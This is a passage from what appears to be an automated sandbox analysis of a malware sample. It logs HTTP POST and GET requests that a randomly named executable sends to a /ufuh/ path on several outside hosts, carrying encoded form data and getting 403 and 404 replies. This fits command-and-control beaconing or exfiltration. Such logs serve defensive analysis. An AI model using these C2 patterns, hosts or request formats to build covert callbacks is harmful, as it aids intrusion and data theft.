42 6a 6d 69 48 32 39 75 79 53 63 41 36 [TRUNCATED]
                                Data Ascii: 84O0=jDXqObkiEjBYQ2jpHaEFURoi987ZxzkKmTKFYSUEPu9gObSMs13OImqdHPpv0lZpACiCXQAgGcPWGaC2NPkwq11TD3b11REX0+5xOvTGTUrvQENLCdHG/2YH6r5jMKvEiNTB0VhzD3fInxT9k5q+AQEFeQyJa6flISi0cUAaTOap1LRlrSEy5ARA7/VwvFCwepT4ukVERDeV3D/7HbNWPWDANouR1tqQCu1wakC7HymS8+qw0w2v+r1HqRGyKzY5seyBx8fHOCa/JvrhoYLxAddjljsB8WMOwsi8wC9Qz2wQAVpc2/H+AxkdxKzntLR5BjmiH29uyScA6tAoZ7F0PJ/nShC3U+4nlo2bdNGuBMZd0tZx0mOvZo8SJbfhBV8etSfKU/IdDh3fMCtwXW0a0HuEh8vB6blJo+GfWYbOvcLa2mhlHMKYi8OPnFam+DuGZEMM335WKXk4tAxf6iKeymUjRcIM0EKQYb/OZI1H1pHgbsehVlMLqDmUFCXnvR4bY9/CyisiBdc7SVgrDDIoZNbDfbEVmRysXEUORcsirHhJUjAp9NPHQES9TkX59rTLhycpBog1ptzRJQIBoO2wanDT1EPQ1SSOGPocnUIvaqZe5SB/mvZWfqpyY4GaAGQP9XJ+lSqJz3LBYm3LOd0pgDZrKUt9gKamC5zgVvZ3/TLKrnIMOFY5SUVkGXbo3qhg4DHkQjybTZzDUSh+3jmum2AiVmULcab/3SKRDkW2iVjPc1TBL3VUL0U2UhGYJbnNXkX8fqq0yx8cmEYdbhmv/FnTqs0cWqiVzIegvUrj95LweIDfMvq9ylqyIcv3rZBZBTP6oQfAO35zF/E1nVLOY8lEuhxk8rpZ8h79SF35oEHmI7uF/C790E7sej617kKTDqaJVzjAZ2b4k/uPlE+dwotYtpk//rSE7LK8Wbh2YBjh8mcEoZmF4RA9ro3VvA4KHF3cJFshVxGjRrTj2Y2Nh91N3ncFJ77am4Kqe6aqXtcJ4gv [TRUNCATED]
                                May 20, 2024 08:55:27.414730072 CEST220OUTData Raw: 43 4f 42 4a 65 5a 58 5a 76 79 7a 45 72 42 56 5a 46 36 4f 32 58 34 53 66 5a 53 59 34 65 39 67 78 72 4c 52 2f 48 65 4a 61 33 71 7a 7a 69 61 47 6b 64 70 61 6a 61 67 52 71 75 48 34 69 61 52 4f 45 54 7a 78 34 47 44 5a 57 55 76 62 35 42 7a 42 48 48 30
                                Data Ascii: COBJeZXZvyzErBVZF6O2X4SfZSY4e9gxrLR/HeJa3qzziaGkdpajagRquH4iaROETzx4GDZWUvb5BzBHH0Aj8j58goRRCNqujBBdntqN5RXesCZqwEeL7celPBXmdjXZTnjup84szdYI5gQvn7m9RbWjSMbtAi7AfvLZ0rg1PhAWEBJwLntAfdT9eCfd35dDElASkZdFpUkVGl9Hi+8xj5w13606


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.224917791.195.240.19802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:29.941282034 CEST731OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 201
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.primeplay88.org
                                Origin: http://www.primeplay88.org
                                Referer: http://www.primeplay88.org/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 78 2f 70 47 4c 45 46 53 78 6f 69 36 38 37 5a 2f 54 6b 45 6d 54 57 6e 59 57 4d 55 4f 66 31 67 50 4b 69 4d 74 48 76 4f 62 57 71 65 49 76 70 6a 72 31 59 74 41 43 69 34 58 51 38 67 47 63 62 57 47 35 71 32 50 4c 77 78 6d 6c 31 64 61 48 62 77 31 52 59 65 30 2b 31 68 4f 76 37 47 54 53 6a 76 52 45 64 4c 48 37 7a 47 74 32 59 42 38 72 35 34 4d 4c 54 64 69 4e 44 4a 30 52 68 7a 44 6d 7a 49 2b 42 7a 39 6a 71 43 2b 4b 77 45 45 55 77 7a 4e 65 35 47 6f 43 45 2b 30 51 47 55 46 4e 63 75 76 32 70 78 58 7a 7a 6f 34 7a 77 70 7a 6b 34 34 55 70 46 7a 39 4e 41 3d 3d
                                Data Ascii: 84O0=jDXqObkiEjBYQx/pGLEFSxoi687Z/TkEmTWnYWMUOf1gPKiMtHvObWqeIvpjr1YtACi4XQ8gGcbWG5q2PLwxml1daHbw1RYe0+1hOv7GTSjvREdLH7zGt2YB8r54MLTdiNDJ0RhzDmzI+Bz9jqC+KwEEUwzNe5GoCE+0QGUFNcuv2pxXzzo4zwpzk44UpFz9NA==
                                May 20, 2024 08:55:30.600327015 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.224917891.195.240.19802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:32.483613014 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 3625
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.primeplay88.org
                                Origin: http://www.primeplay88.org
                                Referer: http://www.primeplay88.org/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 52 56 37 70 45 6f 73 46 58 52 6f 6c 30 63 37 5a 78 7a 6b 66 6d 54 4b 6e 59 53 55 45 50 73 5a 67 4f 64 6d 4d 74 6c 33 4f 4c 6d 71 65 4b 76 70 76 30 6c 5a 6f 41 43 32 53 58 51 4d 61 47 65 33 57 47 59 36 32 4e 4e 4d 77 74 31 31 54 65 48 62 33 31 52 59 78 30 2b 6c 6c 4f 76 75 52 54 54 48 76 57 32 46 4c 50 72 7a 42 6f 32 59 42 38 72 35 43 4d 4c 54 39 69 4e 62 52 30 51 34 30 44 78 4c 49 37 52 54 39 69 4a 71 39 4d 77 45 41 61 51 79 39 61 36 6a 32 49 53 6a 39 63 55 45 38 54 4f 57 70 30 65 4e 6c 72 56 6f 78 6c 41 52 48 6d 50 56 77 67 6c 43 79 65 70 54 6b 75 6b 56 45 52 47 43 56 31 54 2f 37 48 61 4e 56 4c 57 44 41 4f 6f 75 6d 37 4e 6e 33 43 71 6c 65 61 6b 79 72 53 54 69 53 2f 38 79 77 6a 77 32 76 34 62 31 4e 71 52 47 72 46 54 5a 6f 73 65 62 79 78 38 50 74 4f 43 61 2f 4a 74 54 68 74 4f 66 78 4a 74 64 6a 6e 6a 73 36 79 47 4d 4e 77 73 6d 65 77 42 68 51 7a 30 51 51 41 6d 64 63 77 38 76 68 4f 68 6b 63 31 4b 7a 6c 37 37 52 73 42 6a 36 45 48 32 31 41 79 57 67 41 36 [TRUNCATED]
                                Data Ascii: 84O0=jDXqObkiEjBYRV7pEosFXRol0c7ZxzkfmTKnYSUEPsZgOdmMtl3OLmqeKvpv0lZoAC2SXQMaGe3WGY62NNMwt11TeHb31RYx0+llOvuRTTHvW2FLPrzBo2YB8r5CMLT9iNbR0Q40DxLI7RT9iJq9MwEAaQy9a6j2ISj9cUE8TOWp0eNlrVoxlARHmPVwglCyepTkukVERGCV1T/7HaNVLWDAOoum7Nn3CqleakyrSTiS/8ywjw2v4b1NqRGrFTZosebyx8PtOCa/JtThtOfxJtdjnjs6yGMNwsmewBhQz0QQAmdcw8vhOhkc1Kzl77RsBj6EH21AyWgA6vYoJu50P5/kfBCzQ+0Clo+1dOqQBOdd04lx1lmsV48IcrfrXl84tSb0U/odDQ/fNCNwTlcZz3uP3MuDz7ldo+i9Wcf4vuDawGhlLOybjsOKtlbj0jvZZEMy31hGJiQ4tAtf70meymUkBMIK6RT1YbjKZIoA1vrgb8uhVkMLmDmUIiXe0B4dY9rSymxVU5M7T24rFBwoetbBMLEQrxz8XEEORcIMrDVJVHsp8vnHF0S5QkWn9rS6hyYtBowlpuHRJRIB8/2wAXDS5kPUxSS1GPgMnUlKauNerih/1+ZWcKpwa4GaJmQX9TdulT38zy/BYSzLeN02tjZ0MUtykKaKC5jgVvV3/TjKqUgML2A5QkVmbnbuiatp4D3SQi2LTf7DVDh+wgCtomAkDWUBYaao3SKNDgDthhvPchHBbjBTUkU1fBGPH7nHXknWfvqkyAgcmFodOCOv+1nTqs0fWqiRzICevRWI95LweZDfMcS95FqzXsvoh5AaBTLMoU6XO09zEqI1nVLJHslLnBxn8rlu8h6cSF75pyHmJomF/mb9iU7sJT62xEKSDqanVyvqZ1D4kOOPiCqe74tdkJkp2LXG7L2kWZt2YS3h9zwEvpmF2RA8jI3ErA1VHFr6JAx8AQWjTYrj67uOtt1QpndDJ7nhm4yUe7iQXsEJ4Av [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.224917991.195.240.19802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:35.008862019 CEST469OUTGET /ufuh/?84O0=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&-Hc=N8_LbDFHuLL4ejZ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                Host: www.primeplay88.org
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                May 20, 2024 08:55:35.660337925 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.2249180198.12.241.35802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:40.715897083 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 2161
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.aceautocorp.com
                                Origin: http://www.aceautocorp.com
                                Referer: http://www.aceautocorp.com/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 68 76 33 61 36 74 2f 57 76 35 74 71 47 64 46 76 61 35 50 43 4e 45 69 66 78 74 79 41 6f 30 50 36 78 6f 43 72 67 2b 44 4f 6d 6b 74 4d 50 66 58 67 63 61 5a 5a 6c 4f 52 79 4f 35 31 4d 76 65 39 32 2b 34 35 57 37 6f 6e 4a 6b 67 75 51 48 6f 44 5a 64 51 6e 79 47 4a 68 34 57 56 63 63 76 50 4f 73 30 31 49 68 61 37 43 6e 5a 53 4a 39 5a 56 5a 69 65 6d 46 30 70 63 6b 68 43 43 39 43 41 70 58 63 72 73 46 47 4b 59 2b 79 72 50 47 4d 61 51 61 43 4e 4e 31 42 6a 4d 72 2b 62 6c 31 4b 31 38 36 6c 59 2f 4f 45 62 2b 64 55 66 42 37 46 2f 4f 75 66 53 4b 54 6f 4b 6f 56 47 46 32 54 63 59 55 4b 43 38 2b 6f 76 53 6d 47 70 38 32 4f 31 55 6f 2b 63 4f 42 54 39 6e 45 46 69 64 52 50 69 35 46 37 51 6c 31 79 38 49 73 61 6a 65 48 7a 61 2f 35 58 48 39 36 48 77 65 70 65 30 4c 39 57 35 65 2f 64 54 31 7a 48 36 5a 5a 4f 48 31 48 2f 45 65 5a 7a 6b 45 70 47 6b 62 35 78 35 56 79 7a 4e 56 47 67 37 72 47 30 32 63 35 76 38 43 36 39 52 43 6b 37 57 52 77 71 56 77 77 42 45 39 75 2f 51 61 2b 55 65 44 [TRUNCATED]
                                Data Ascii: 84O0=mC8lfqMH3K9Ohv3a6t/Wv5tqGdFva5PCNEifxtyAo0P6xoCrg+DOmktMPfXgcaZZlORyO51Mve92+45W7onJkguQHoDZdQnyGJh4WVccvPOs01Iha7CnZSJ9ZVZiemF0pckhCC9CApXcrsFGKY+yrPGMaQaCNN1BjMr+bl1K186lY/OEb+dUfB7F/OufSKToKoVGF2TcYUKC8+ovSmGp82O1Uo+cOBT9nEFidRPi5F7Ql1y8IsajeHza/5XH96Hwepe0L9W5e/dT1zH6ZZOH1H/EeZzkEpGkb5x5VyzNVGg7rG02c5v8C69RCk7WRwqVwwBE9u/Qa+UeDlrB3UEnvBmTAGcdR7IdoTHMvvJy+fzdR7U7Pm08uxlXYVbSUIFidczDQLTLu3dsB0lBubzz9/EHluNWXv8spFIK1r0ed0j5MODYqK30yn5BcplTkeSmAVxuWUlfpXcnZaG1OCQZn1ZzQN8MRQ1fGgc0LmqybdS21XZ3jGHIOFKrEc/uSSyIAbPwKJBMA/SxhDuBH9yh5Pn7SFov9k8r2IXfrsP6WMNWC9UqrZRxNaHLPJVdLrMyEtxC3BIvsSO3UhbmxEfW7SSccNqDUEEFaySK35TjFktSBGC7dD31bIQ4UWvlRF3Nu+UIK8zBu7EvEKVAoFzFf6J+yuGM+mlWr7//2SWKdMwN8fZwVly79kb6kkjh2AQ7KWasEz+0JF+jF/AQpN+ADUVDELX3DEw8pNARu5A4mzAQRVXFhJl+OQlRimJVHYQYq9GG5B72KZOT4D0gSnEdDY5M7kFJp0h/YLX9pa3x0it/n+66ryHLTNXGfZ1slN93zRJlwSfwA4qZ1fnfmkmi+A+bi/Y5R/2apLe8i4VxUKlMurKrf2cvhWZZZBwRRhH2Gs4Da1IffmvHXnxzYogWjvjA59PcaOrtbcoPF17KAKDh7sUye34tTv2Au9f+MFARvGiFHslJxItk8wHmFGEjJ1U3hIRPdDZJECYeDBi+PtO0gsf [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.2249181198.12.241.35802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:43.301086903 CEST731OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 201
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.aceautocorp.com
                                Origin: http://www.aceautocorp.com
                                Referer: http://www.aceautocorp.com/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 68 73 66 61 34 2f 48 57 75 5a 74 71 46 64 46 76 42 4a 50 45 4e 45 75 74 78 76 66 46 70 44 72 36 32 38 4f 72 68 4d 72 4f 68 6b 74 4c 62 50 58 6b 52 36 5a 41 6c 4f 52 41 4f 35 35 4d 76 65 35 32 73 75 39 57 39 74 4c 4f 6d 51 75 53 54 59 44 59 64 51 36 4f 47 4a 74 6f 57 55 6b 63 76 4d 61 73 79 45 34 68 50 76 69 6e 66 69 4a 33 51 31 5a 78 65 6d 4a 68 70 63 56 74 43 43 52 43 41 59 4c 63 72 39 6c 47 49 35 2b 79 77 66 47 4e 58 77 62 30 47 34 45 2f 6d 50 58 68 48 45 42 32 32 2f 57 2b 46 6f 61 4a 52 73 46 6c 63 54 66 59 36 49 62 63 45 36 4f 63 4a 51 3d 3d
                                Data Ascii: 84O0=mC8lfqMH3K9Ohsfa4/HWuZtqFdFvBJPENEutxvfFpDr628OrhMrOhktLbPXkR6ZAlORAO55Mve52su9W9tLOmQuSTYDYdQ6OGJtoWUkcvMasyE4hPvinfiJ3Q1ZxemJhpcVtCCRCAYLcr9lGI5+ywfGNXwb0G4E/mPXhHEB22/W+FoaJRsFlcTfY6IbcE6OcJQ==
                                May 20, 2024 08:55:44.029783010 CEST1236INHTTP/1.1 404 Not Found
                                Date: Mon, 20 May 2024 06:55:43 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 9730
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED]
                                Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQo*Pnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDu*uVQ=Y*a1<)pP:D?^7pYtd(1]0m&1oyWhR7(+?KU{^C+"c<y'YQkpf1N|fmpW>nlz4k_\+)weabmC_t'Ljk_1xbZ9*!TxT=,OMV$9oO2Qk5wVlv"ju}OFE:I
                                May 20, 2024 08:55:44.031785011 CEST224INData Raw: ff fe ae f2 bb c6 15 b4 9f b2 34 36 8d 88 04 d3 83 e4 ba 7d b9 fd b8 4b 8d 6b 26 6d 11 2e 93 81 0b 07 ba 98 b1 dd d2 4c d5 32 49 81 73 db 89 1d da fd 86 dd 10 9e b1 14 44 ca bf b1 05 c1 18 b3 15 9a ef 07 5a 56 ab 41 37 55 11 ff a5 a6 85 ff 18 fb
                                Data Ascii: 46}Kk&m.L2IsDZVA7UC[-zRpWjc{V}fMeSj(70QD/_x"V2/U#+n`tB(E$C(+|fiZcRuzIT>PD
                                May 20, 2024 08:55:44.036679029 CEST1236INData Raw: 62 ac 89 87 a1 c2 43 8e 01 d5 48 7b d6 67 58 7a e6 6c 5d 69 e2 59 a3 5b 6d ab 1b 4e 3a a6 c5 d8 7a cf a9 7a 3c b3 fa f7 f4 0f 6b 8e 9d d3 ab 55 60 2a 74 19 7f aa d4 6a 8f e5 ed 11 0e 11 57 3d 49 65 9d e4 8c b9 17 32 30 07 d2 ac 26 b9 47 d5 f4 2c
                                Data Ascii: bCH{gXzl]iY[mN:zz<kU`*tjW=Ie20&G,'._WfK@fCyq[GQnd2C6`2Y-*eA}ut~Z!]to*hOxqZoc[kYA1NFnOtI~IX<Z}_r
                                May 20, 2024 08:55:44.036700010 CEST224INData Raw: 74 07 c3 39 ad b3 18 83 9a 20 f6 ac ea 3c ad ab 9e c7 aa a9 0d 55 29 c5 a2 32 3a ef e8 85 8c 4f 3e be df 6c 7b b1 f6 f1 cf b9 d4 c7 23 bd 49 10 f5 d7 4e b7 b6 89 e9 89 e8 95 c3 03 41 a5 b4 7f 89 73 48 a5 d9 3f 46 08 ba a2 da a6 3c 53 8d fb 99 03
                                Data Ascii: t9 <U)2:O>l{#INAsH?F<SwO&c7Fp7VTsM-\%9Cx4{u]fV2^#P>FTLE!\L(q7vUk>u&LYS^+(QfyH5BR^
                                May 20, 2024 08:55:44.041630030 CEST1236INData Raw: 96 96 45 9e 28 a8 9c 28 1e 41 4f 2d b2 dc e8 7e bd ca e2 34 38 ed 0f 73 26 c7 c1 2b 3d b0 e2 aa 04 10 e9 44 ee 55 b8 83 ed 86 1f 24 ea 0f 7f c6 e6 10 ea 67 9e d6 f1 4e d1 8e d1 31 dd 54 47 91 5b f4 32 85 36 5d ab be 0e 82 6c 02 3d 66 de 99 3b 5e
                                Data Ascii: E((AO-~48s&+=DU$gN1TG[26]l=f;^qR2^,MyYym)dPsJ3?fdI,1!P]3\h2keeqd7/2bFg%\u(dS;s-w6G$J"191]+iKiRN
                                May 20, 2024 08:55:44.041649103 CEST224INData Raw: dc 85 7d a6 3b 77 0d 9d fd b3 67 3d ea 4d 0d d4 1b 77 74 81 b9 46 80 ab d9 74 fc d7 e4 9a 94 27 85 e8 0d 2b 0b f9 67 16 88 30 6e f4 9e dc 72 de f0 2c 22 b7 3c c9 43 1d e2 90 8f 1e 4f 76 ec 35 fd 47 96 e4 12 c4 47 c3 48 4b fd 67 18 a5 52 b4 3b 88
                                Data Ascii: };wg=MwtFt'+g0nr,"<COv5GGHKgR;;rviup;KNuZj]mkkNJwg[*Ij:ratJG*WUE>0y=x!A<Y5"VZrtr6.Y,
                                May 20, 2024 08:55:44.041678905 CEST1236INData Raw: 5e 23 17 28 4c 15 14 1c 91 d1 80 4f be ca 63 2a 3a 4d 36 aa 0e 87 fe 65 0b 14 dc e4 2b 5a bd ac 0b 3a 1e 37 df ea a1 a1 73 13 6b 74 2a 61 9d ce 17 94 4c 36 e8 97 29 c3 69 31 69 71 06 aa e6 cc da 66 75 7a e3 d8 c6 3b dd d0 44 4e 50 e8 90 05 c2 52
                                Data Ascii: ^#(LOc*:M6e+Z:7skt*aL6)i1iqfuz;DNPR9EOWP,#]6K6<,w[*+XJnj8TZ1vmQ%d{2)PTfy3Ul<pnI(hV:G\E(Rl`glmZ5p*S?kd
                                May 20, 2024 08:55:44.041696072 CEST224INData Raw: ad 02 d0 83 86 f5 04 44 60 e6 3e ef 80 3c b2 f1 ba 2e e0 5e d9 c6 60 d3 14 70 05 4a 3a 2b 60 34 ca 50 af b7 8e 12 f8 e2 fb b5 ef af aa 7e 5c 97 fd 6c 86 53 1e aa ce 7a e8 2c cc 36 a7 ce 8f 4c c0 e9 bd d1 70 ea 08 1c 74 7f d6 76 e5 8b c2 a0 4f fa
                                Data Ascii: D`><.^`pJ:+`4P~\lSz,6LptvO+{o=O&zt#6zUsQoQ0Jsb~5h?ve]?]|DGz1H`@@J#Xw;yh-r
                                May 20, 2024 08:55:44.051379919 CEST1236INData Raw: d8 0d 81 a8 5b a7 e9 7c c1 f8 6f 08 55 3d ac 1a c2 1b a2 34 7a db d9 f8 0d 71 3d a1 bc b3 d9 1b 92 21 c1 2f 1d 05 1f e8 e2 30 48 e9 2f 2f dc 52 7d 01 63 b4 e0 76 4b 8e 32 cb 04 27 f0 b5 2a 26 29 c0 b4 8b a3 05 88 a9 85 f0 ce 4a 31 7f da a9 e8 22
                                Data Ascii: [|oU=4zq=!/0H//R}cvK2'*&)J1"n_KC:,)O%vk9.fN.LoC$N0&4E4>:}l&53=#B\2p.`@2&#h^LXa3i\r`Y<
                                May 20, 2024 08:55:44.051399946 CEST224INData Raw: 6e 14 22 b4 95 b9 51 89 dc 82 e6 46 31 bf 76 75 bd 10 8f d3 da e6 47 37 76 1b 9c 73 71 46 6b 99 f3 ad 9e d1 da eb 9c b3 17 a7 15 cf 99 5c 40 db 9e 1b 8d 80 16 3f 57 f4 80 f6 36 37 0a 11 a4 83 dc a9 04 c9 0c f9 7b df f6 36 37 1a 81 f2 45 ce af 00
                                Data Ascii: n"QF1vuG7vsqFk\@?W67{67E#o/%bvb$&INB1rCr&IN/Oq7rn|IL\;D5DC~=Ln{C|^!AN>@.9nc!YfKaJ
                                May 20, 2024 08:55:44.053814888 CEST1236INData Raw: 4e ba 3a 56 10 7e 30 cf 77 19 99 e7 97 ac 60 22 ce b4 45 33 3f cf 31 91 d1 a8 05 a6 d6 65 9d be 6e 92 e8 22 e1 ac 67 81 46 eb 39 d6 b5 40 1a 6e 6e e8 b2 65 cf 2f 2d 6e 54 67 7b 24 5b a1 e7 47 da 01 e9 f7 46 9e 71 66 ab d3 95 a6 82 f3 ae 87 60 7d
                                Data Ascii: N:V~0w`"E3?1en"gF9@nne/-nTg{$[GFqf`}5Fc-GKs?JEC\8(oriaDNG}O;A2tidNg}O;+zbu.\?$15\cRd\gtFc


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.2249182198.12.241.35802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:45.819449902 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 3625
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.aceautocorp.com
                                Origin: http://www.aceautocorp.com
                                Referer: http://www.aceautocorp.com/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
